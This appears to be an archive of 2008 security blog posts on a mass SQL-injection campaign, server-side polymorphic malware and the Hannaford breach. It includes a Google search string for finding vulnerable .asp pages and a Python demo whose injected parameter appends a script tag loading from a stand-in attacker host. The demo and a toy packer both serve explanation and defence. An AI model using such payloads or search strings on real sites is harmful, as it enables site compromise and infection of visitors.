SC Magazine Pod-Cast on Massive SQL Injection Attack

April 30, 2008

Yesterday Chuck Miller from SC Magazine published a podcast in which I discussed the details of the mass web hack covered earlier. PandaLabs had confirmed that no IIS vulnerability was involved in this latest round of attacks; the culprit was poorly written .ASP code that built its SQL queries directly from request parameters.

It is extremely important to understand that we are talking about hundreds of thousands of sites that fell victim, including those of the Department of Homeland Security and the United Nations. We really need to start raising awareness that security must be built into the code from the start to prevent such situations from occurring.

The podcast can be found at http://podcasts.scmagazine.com/


Massive iframe hack: The conclusions

April 28, 2008

Perception vs. Reality

It may seem that things are getting better and that cyber-crime is diminishing, but the evolution of hacking for profit will continue unabated through the remainder of this year.

Data breaches are becoming commonplace, and corporate CIOs are focusing their attention on the protection of critical assets, especially external-facing applications that are subject to a number of specialized attacks.

We have seen an explosion of high-profile hacks that target external-facing web applications and exploit their vulnerabilities to gain access to private and sensitive information.

These attacks are getting better and more sophisticated by the day. Some of them use complex SQL injection techniques to manipulate web sites, with results ranging from a simple insertion of a malicious iframe tag into page content to the complete compromise of a web server.

It is interesting to see how many web sites are vulnerable, and how easily candidate targets can be found: a Google search for specific strings (for example http://www.google.com/search?q=inurl:".asp" inurl:"a=", which returns .asp pages that take a query-string parameter named a) reveals sites that are potentially exploitable. That is exactly how the hackers automated a massive web hacking campaign that affected over half a million web sites, including those of the Department of Homeland Security and the United Nations.

A crafted SQL statement was used to compromise each site and insert a malicious JavaScript reference into its stored content; that script ultimately attempted to exploit several already known vulnerabilities in Microsoft Windows and install malware on visitors' PCs. In other words, the hackers found a way to infect hundreds of thousands of web sites automatically by running essentially the same statement against every vulnerable page.
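To make that mechanism concrete, here is an added example written for this page; it is not the attackers' payload and not code from any affected site. It models in Python, with SQLite standing in for SQL Server, what the vulnerable classic-ASP pattern does with a crafted parameter and why the same request is harmless against a parameterized query. The table name page, the parameter name a (matching the search string above), the script host malicious.example and the sample rows are all constructed for the example, and the run_batch helper only mimics the fact that ADO on SQL Server executes every statement in a batch, which is what lets an injected UPDATE ride along on a SELECT.

```python
"""Added example: a model of the 2008 mass SQL-injection pattern.
Not the real payload and not code from any affected site.
SQLite stands in for SQL Server; the split-on-';' batch runner models ADO's
multi-statement execution (SQLite's execute() refuses stacked statements)."""
import re
import sqlite3

# Constructed sample content; the sites hit in the campaign stored page text
# in columns like this one.
SAMPLE_ROWS = [
    (1, "Welcome to the site"),
    (2, "Press releases"),
]

# Hypothetical attacker host; the campaign appended a tag of this shape.
INJECTED_TAG = '<script src="http://malicious.example/js.js"></script>'

# Injected-content marker: a script or iframe tag that loads from a src.
INJECTION_MARKER = re.compile(r"<(script|iframe)\b[^>]*\bsrc\s*=", re.IGNORECASE)


def fresh_db():
    """A new in-memory database holding the sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE page (id INTEGER PRIMARY KEY, body TEXT)")
    db.executemany("INSERT INTO page VALUES (?, ?)", SAMPLE_ROWS)
    db.commit()
    return db


def run_batch(db, sql):
    """Model of batch execution on SQL Server: every ';'-separated statement in
    the string runs.  The naive split is a modelling shortcut for the example,
    not a SQL parser (it would mis-split a ';' inside a string literal)."""
    rows = []
    for stmt in filter(None, (s.strip() for s in sql.split(";"))):
        cur = db.execute(stmt)
        if cur.description:            # only SELECTs produce rows
            rows.extend(cur.fetchall())
    db.commit()
    return rows


def lookup_vulnerable(db, a):
    """The classic-ASP mistake, i.e.
        sql = "SELECT body FROM page WHERE id=" & Request.QueryString("a")
    The parameter becomes part of the SQL text, so whatever it contains is
    parsed and executed as SQL."""
    return run_batch(db, "SELECT body FROM page WHERE id=" + a)


def lookup_parameterized(db, a):
    """The fix: the SQL text is fixed and the value travels as a bound
    parameter, so it can only ever be compared against id, never parsed."""
    return db.execute("SELECT body FROM page WHERE id=?", (a,)).fetchall()


def find_injected_rows(db):
    """The after-the-fact check a site owner wants: which stored rows now carry
    a script/iframe tag that loads from an external src."""
    return [row_id for row_id, body in db.execute("SELECT id, body FROM page")
            if INJECTION_MARKER.search(body)]


def demo():
    """Runs the same crafted parameter through both code paths.  Returns
    (rows the vulnerable page served, rows it left injected,
     rows the parameterized page left injected)."""
    # A stacked UPDATE riding on the expected integer id.  SQL Server concatenates
    # with '+' and the real campaign hid its statement inside a hex CAST();
    # '||' is SQLite's concatenation operator.
    payload = "1; UPDATE page SET body = body || '" + INJECTED_TAG + "'"

    vulnerable = fresh_db()
    served = lookup_vulnerable(vulnerable, payload)   # the SELECT still "works"
    safe = fresh_db()
    lookup_parameterized(safe, payload)               # no id equals that string
    return served, find_injected_rows(vulnerable), find_injected_rows(safe)


if __name__ == "__main__":
    print(demo())   # ([('Welcome to the site',)], [1, 2], [])
```

The vulnerable path returns the page the visitor asked for, so nothing looks wrong from the browser, while every row in the table now carries the tag; the parameterized path returns nothing for the crafted value and leaves the table untouched. In classic ASP the equivalent of the bound parameter is an ADODB.Command with a Parameters collection, or at the very least converting a to an integer before it goes anywhere near the query. The marker regex is deliberately broad; for a real clean-up, compare the matches against the external hosts the site legitimately loads scripts from.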

According to the Identity Theft Resource Center (ITRC), the number of data breaches recorded so far in 2008 is already approaching the total for all of 2007, which raises the obvious question of why internal controls are failing to protect critical assets when a breach occurs.

So why are internal controls failing? Thoughts?


Crimeware as a Service (CaaS) Updated

April 28, 2008

As the malware threat landscape continues to evolve, hackers are constantly changing techniques to counter the detection technologies that vendors develop. By using sophisticated methods to evade current antivirus technologies, hackers are relentless in their pursuit of damaging IT systems and, often, gaining access to personal information.

Several years ago, hackers used polymorphism and metamorphism to constantly generate new variants of worms. Through polymorphism the virus re-encoded itself into a different byte sequence on each infection, so no fixed byte string survived across variants and signature-based scanners were bypassed. The antivirus industry eventually responded with emulation: the scanner runs the sample's own decryption routine in a virtual CPU until the constant body emerges, and that body can then be detected by other means (signatures and heuristics). Reliable protection still depended on the researcher's access to the polymorphic engine; its logic had to be decoded before protection could cover every mutation it was capable of producing.

Subsequently, proactive technologies (behavioral, heuristics) were developed when worms began to self-replicate across networks and exploit zero-day vulnerabilities faster than a signature could be created. The idea was to provide protection without depending solely on reactive technologies, which were slow and clunky, and instead to use methods that attempt to predict dangerous characteristics. Heuristics was the first real stride towards being proactive, using a statistical probability model to estimate a file's likelihood of being malicious. In today's world, however, malware is run by organized criminals who have simply adapted to the technologies that vendors have developed over the years.

As the malware landscape has evolved, hackers have shifted their interest from fame to profit and will do anything for financial gain, developing new and innovative ways to slip below the radar. Some of these methods are genuinely inventive and show out-of-the-box thinking when it comes to crime. For example:

· Custom HTML injection into financial sites, performed inside the victim's browser, to obtain additional information beyond what the bank itself asks for

As we begin to map out the evolution there are several common themes when it comes to stealth and camouflage techniques:

· Custom run-time packers

· Server-side polymorphism

· Virtual machine / sandbox detection

In the lab we have found that approximately 90 percent of all malware uses some form of packer, and the trend indicates they are becoming more customized by the day, making the analyst's job harder. Packers are used because compressing or encrypting the code prevents AV analysts from easily decoding the sample, which dramatically increases reaction time. AV vendors are constantly evolving generic unpacking routines (techniques that decompress the file in memory and reveal the malware) in order to combat the rise of packers.

Finally, we have found the emergence of server-side polymorphism, or "Crime-Ware as a Service (CaaS)" as the industry describes it, in which the polymorphic engine does not reside within the virus code itself but remotely on a server. There are two forms of server-side polymorphism that we know of today: the type that distributes mutated variations of malware into the wild in volume, and the type used on PCs that are part of a bot-net, where the specific bot variant can be mutated remotely via a command over HTTP. This is called crime-ware as a service because the mutation engine does not reside on the host but in the cloud, similar to a software-as-a-service platform. In other words, CaaS provides malware on demand to the infected host.

This methodology has proven quite effective and difficult to counteract within the traditional anti-malware model. Server-side polymorphism is so hard to detect because the transformation function (the routines used to change the signature of the code) is never visible to the virus analyst; only its output, a stream of distinct samples, ever reaches the lab. The actual algorithms involved therefore cannot be studied to the degree necessary to create an effective vaccination. Bot-net communication is often encrypted as a defense mechanism to prevent easy discovery of the command-and-control server dishing out the mutated malware. As a result, attacks using server-side polymorphism often succeed in infecting their target while flying under the radar.

The best bet for stopping server-side polymorphism is host-based intrusion prevention technology, better known as HIPS. HIPS operates on the host itself, so intrusions and infections are dealt with at each individual workstation, and it is widely regarded by security experts as a more effective safeguard against malware. A HIPS solution is only as effective as the layers of inspection it implements, ranging from the network stack to the application layer and using proactive technologies (heuristics, behavioral analysis, behavioral blocking, etc.) to provide a holistic view of the threat at hand.


Security Shouldn’t Take a Backseat to Virtualization

April 28, 2008

There is no question that advances in server virtualization technology are becoming popular among corporations that want to save money by consolidating resources and improving operational efficiency. Virtualization delivers dramatic savings in ongoing maintenance and in the cost of keeping physical assets afloat.

These benefits are often seen by CIOs and other information technology leaders as adding tremendous value to an existing robust IT infrastructure. Who wouldn't want to save money by reducing the size and extent of their data center, especially in the manufacturing and financial services industries?

See the complete article at Virtualization Journal.


Regulatory Compliance & The Real Risk of Undetected Malware: Part 2

April 18, 2008

I am working on a white paper that covers the disconnect between the formal audit process and the technical safeguards implemented to ensure internal controls are adequate. Part 1 of this series discussed the missing element; this continuation delves deeper into the problem. Thoughts? Comments?

“In the wake of undisclosed data breaches and public information exposure, regulatory compliance and security audit standards are becoming ever more important to protecting critical assets.

However, despite this recent upsurge in attacks, internal controls seem to fail when it comes to assurance that critical assets remain uncompromised. Therefore, better standards need to be developed and taken into consideration when going through the formal process to become SOX, GLB, PCI or HIPAA compliant.

This is crucial especially considering that criminals are in it for monetary gain; in other words, we have an evolution towards hacking for profit that completely changes the rules of the game.

Corporations just can't afford to take short-cuts when it comes to information assurance; otherwise it is almost certain that they will become victims of a serious exposure of private and confidential data. This paper will explore the several disconnects between established and accepted security audit frameworks and the factor of unnoticed infection points.”


Server-Side Polymorphism or Crime-ware as a Service (CaaS)

April 16, 2008

As the threat landscape evolves, hackers are constantly changing technique in order to counteract the detection technologies that vendors develop. I remember a few years ago when polymorphism and metamorphism were used as a way to constantly generate new variants of worms.

Essentially, the virus morphed itself into different variations and successfully evaded signature-based technologies. Eventually the anti-virus industry responded by creating emulation technologies to counteract this new breed of virus.

Subsequently, proactive technologies (behavioral, heuristics, etc.) were developed when worms began to self-replicate across networks and exploit 0-day vulnerabilities faster than a signature could be created. In today's world, however, malware is run by organized crime and has simply adapted to the technologies that vendors have developed over the years.

As we are already familiar with the shift from fame to profit, hackers will do anything to make a buck these days, developing new and innovative ways to slip below the radar. Some of these methods are genuinely inventive and show out-of-the-box thinking when it comes to crime.

As we begin to map out the evolution, there are several common themes when it comes to stealth and camouflage techniques:

  • Custom run-time packers
  • Server-side polymorphism
  • Virtual machine / sandbox detection

According to PandaLabs, approximately 90% of all malware uses some form of packer, and the trend indicates they are becoming more customized by the day, making the analyst's job harder.

Furthermore, we are seeing the emergence of server-side polymorphism, or "Crime-Ware as a Service (CaaS)" as the industry describes it, in which the polymorphic engine does not reside within the virus code itself but remotely on a server.

This methodology has proven quite effective and difficult to counteract within the traditional anti-malware model. The reason server-side polymorphism is so hard to detect is that the transformation function (the routines used to change the signature of the code) is never visible to the virus analyst, so the actual algorithms or techniques involved cannot be studied to the degree necessary to create an effective vaccination.
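To show concretely why the byte signatures discussed here, and in the April 28 "Crimeware as a Service (CaaS) Updated" post above, fail against per-download mutation, and what the emulation approach recovers, here is an added example written for this page. It is a toy model in Python, not code from PandaLabs, from any AV engine or from any real malware: the "payload" is an inert string, the "packer" is a one-byte XOR or ADD with a per-download key, and the two-byte decoder "stub" stands in for the decryption loop a real packed sample carries. The names OP_XOR, OP_ADD and PAYLOAD and the three keys are arbitrary choices for the example.

```python
"""Added example (not from the post, PandaLabs, any AV engine or real malware):
a toy model of server-side polymorphism versus signature- and emulation-based
detection.  The payload is an inert string, the 'packer' is a one-byte XOR or
ADD with a per-download key, and the 2-byte 'stub' stands in for the decoder
loop that a real packed sample carries."""
import hashlib

PAYLOAD = b"inert demo payload: stands in for the real malicious body"

OP_XOR, OP_ADD = 0x01, 0x02   # the two decoder stubs this toy packer can emit


def pack(payload, op, key):
    """The mutation step the server performs per download: encode the same
    payload with a fresh (op, key) pair and prepend a 2-byte decoder stub.
    Every download therefore has a different byte image and a different hash."""
    if op == OP_XOR:
        body = bytes(b ^ key for b in payload)
    elif op == OP_ADD:
        body = bytes((b + key) & 0xFF for b in payload)
    else:
        raise ValueError("unknown packer op")
    return bytes([op, key]) + body


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def emulate(sample):
    """Generic unpacker: execute the decoder the sample carries instead of
    matching its bytes.  The mutation engine (which op/key comes next) lives on
    the server and is never in the sample, which is exactly the analyst's
    problem; the decoder stub is, and that is enough to recover the payload."""
    op, key, body = sample[0], sample[1], sample[2:]
    if op == OP_XOR:
        return bytes(b ^ key for b in body)
    if op == OP_ADD:
        return bytes((b - key) & 0xFF for b in body)
    raise ValueError("unknown decoder stub")


def classify(sample, byte_sigs, payload_sigs):
    """Which layer catches the sample: 'signature' (hash of the file as
    downloaded), 'emulation' (hash of what its decoder produces), or None."""
    if sha256(sample) in byte_sigs:
        return "signature"
    if sha256(emulate(sample)) in payload_sigs:
        return "emulation"
    return None


def demo():
    """Three downloads of the 'same' malware from the mutation server, with a
    signature database built from the first one only."""
    variants = [
        pack(PAYLOAD, OP_XOR, 0x5A),   # the sample the lab received
        pack(PAYLOAD, OP_ADD, 0x17),   # the next victim's download
        pack(PAYLOAD, OP_XOR, 0xA3),   # and the next
    ]
    byte_sigs = {sha256(variants[0])}
    payload_sigs = {sha256(emulate(variants[0]))}
    return [classify(v, byte_sigs, payload_sigs) for v in variants]


if __name__ == "__main__":
    print(demo())   # ['signature', 'emulation', 'emulation']
```

Only the first download matches the byte signature; the other two are caught solely because the emulator ran their decoders and compared the recovered payload. Real packers need a full CPU emulator rather than a two-opcode interpreter, and a sample that detects the emulator or a virtual machine (the third theme in the list above) will refuse to unpack; those two facts are why vendors keep evolving generic unpacking and pair it with behavioral layers instead of relying on emulation alone.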

Server-side polymorphism will open the door to all sorts of problems, from an increase in targeted attacks to undisclosed data breaches, if corporations do not take a holistic approach to end-point security.

Your best bet for stopping server-side polymorphism is host-based intrusion prevention technology, or HIPS as we call it. So what do we define as HIPS? According to Gartner analyst Neil McDonald, HIPS comprises several different technologies, from attack-facing network inspection to behavioral containment.


The Hannaford hack: what we can learn from it

April 5, 2008

Most people have heard by now of the recent high-profile data security breach at the retail chain Hannaford Bros. According to an article published by SC Magazine (http://www.scmagazineus.com/Hannaford-tells-regulators-how-breach-happened/article/108569/), hackers placed hidden malware on nearly 300 servers to intercept transactions.

This malware was designed to locate and capture credit card information from consumers who shopped at the stores; the hackers ultimately harvested 4.2 million credit card numbers over a period of three months.

What a knock-out that was!

The question we have to ask is why their anti-virus / anti-malware solution did not detect the malware for three months. That is a great question; most people today live under the assumption that they are well protected from the dangers of the Internet just because their AV solution says it is up to date and their firewalls are enabled.

Unfortunately, the traditional signature-based anti-malware model is crumbling under the sheer force of numbers (the rapid pace at which new malware is created daily). The industry therefore has to take a holistic approach to solving this problem, using many different layers, including proactive technologies.

Ideally, if a proactive approach had been taken to continuously monitor critical assets, the situation could potentially have been avoided altogether. In closing, this is a very real example of how even an environment thought to be secure can be breached by hackers who have the drive to commit financial fraud. Let our lesson be learned.